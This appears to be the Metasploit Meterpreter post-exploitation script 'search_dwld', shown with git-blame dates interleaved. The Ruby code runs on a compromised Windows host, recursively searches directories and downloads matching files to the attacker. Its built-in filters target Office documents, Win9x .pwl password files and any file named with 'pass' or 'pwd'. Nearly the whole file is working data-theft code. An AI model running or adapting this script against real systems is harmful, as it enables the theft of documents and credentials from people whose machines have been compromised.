2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2007-05-22 21:08:47 +00:00
|
|
|
|
|
|
|
## Meterpreter script that recursively search and download
|
|
|
|
## files matching a given pattern
|
|
|
|
## Provided by Nicob <nicob [at] nicob.net>
|
|
|
|
|
|
|
|
## == WARNING ==
|
|
|
|
## As said by mmiller, this kind of script is slow and noisy :
|
|
|
|
## http://www.metasploit.com/archive/framework/msg01670.html
|
|
|
|
## However, it can sometimes save your ass ;-)
|
|
|
|
## == WARNING ==
|
|
|
|
|
|
|
|
# Filters
|
2009-11-05 00:44:03 +00:00
|
|
|
$filters = {
|
2009-03-29 16:36:15 +00:00
|
|
|
'office' => '\.(doc|docx|ppt|pptx|pps|xls|xlsx|mdb|od.)$',
|
2007-05-22 21:08:47 +00:00
|
|
|
'win9x' => '\.pwl$',
|
|
|
|
'passwd' => '(pass|pwd)',
|
|
|
|
}
|
|
|
|
|
2009-11-05 00:44:03 +00:00
|
|
|
@@opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false,"Help menu." ]
|
|
|
|
)
|
2007-05-22 21:08:47 +00:00
|
|
|
|
2009-11-05 00:44:03 +00:00
|
|
|
def usage
|
|
|
|
print_line "search_dwld -- recursively search for and download files matching a given pattern"
|
|
|
|
print_line "USAGE: run search_dwld [base directory] [filter] [pattern]"
|
|
|
|
print_line
|
|
|
|
print_line "filter can be a defined pattern or 'free', in which case pattern must be given"
|
2010-05-03 17:13:09 +00:00
|
|
|
print_line "Defined patterns:"
|
2009-11-05 00:44:03 +00:00
|
|
|
print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n")
|
|
|
|
print_line
|
|
|
|
print_line "Examples:"
|
|
|
|
print_line " run search_dwld"
|
|
|
|
print_line " => recursively look for (MS|Open)Office in C:\\"
|
|
|
|
print_line " run search_dwld %USERPROFILE% win9x"
|
|
|
|
print_line " => recursively look for *.PWL files in the user home directory"
|
2010-01-21 17:57:12 +00:00
|
|
|
print_line " run search_dwld E:\\\\ free '\.(jpg|png|gif)$'"
|
2009-11-05 00:44:03 +00:00
|
|
|
print_line " => recursively look for pictures in the E: drive"
|
|
|
|
print_line(@@opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
2007-05-22 21:08:47 +00:00
|
|
|
end
|
|
|
|
|
2009-11-05 00:44:03 +00:00
|
|
|
@@opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
usage
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
2007-05-22 21:08:47 +00:00
|
|
|
def scan(path)
|
|
|
|
client.fs.dir.foreach(path) {|x|
|
|
|
|
next if x =~ /^(\.|\.\.)$/
|
|
|
|
fullpath = path + '\\' + x
|
|
|
|
|
|
|
|
if client.fs.file.stat(fullpath).directory?
|
|
|
|
scan(fullpath)
|
|
|
|
elsif fullpath =~ /#{$motif}/i
|
|
|
|
# Replace ':' or '%' or '\' by '_'
|
|
|
|
dst = fullpath.tr_s(":|\%|\\", "_")
|
|
|
|
dst = ::Dir.tmpdir + ::File::Separator + dst
|
|
|
|
print_line("Downloading '#{fullpath}' to '#{dst}'")
|
|
|
|
client.fs.file.download_file(dst, fullpath)
|
|
|
|
end
|
|
|
|
}
|
2009-10-25 18:04:39 +00:00
|
|
|
end
|
2009-11-05 00:44:03 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
#check for proper Meterpreter Platform
|
|
|
|
def unsupported
|
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
platform = client.platform.scan(/(win32|win64)/)
|
|
|
|
unsupported if not platform
|
2009-11-05 00:44:03 +00:00
|
|
|
# Get arguments
|
|
|
|
basedir = args[0] || "C:\\"
|
|
|
|
filter = args[1] || "office"
|
|
|
|
|
|
|
|
# Set the regexp
|
|
|
|
if filter == 'free'
|
|
|
|
if args[2].nil?
|
|
|
|
raise RuntimeError.new("free filter requires pattern argument")
|
|
|
|
end
|
|
|
|
$motif = args[2]
|
|
|
|
else
|
2010-05-03 17:13:09 +00:00
|
|
|
$motif = $filters[filter]
|
2009-11-05 00:44:03 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
if $motif.nil?
|
|
|
|
raise RuntimeError.new("Unrecognized filter")
|
|
|
|
end
|
|
|
|
|
2010-05-03 17:13:09 +00:00
|
|
|
# Search and download
|
2009-11-05 00:44:03 +00:00
|
|
|
scan(basedir)
|
|
|
|
|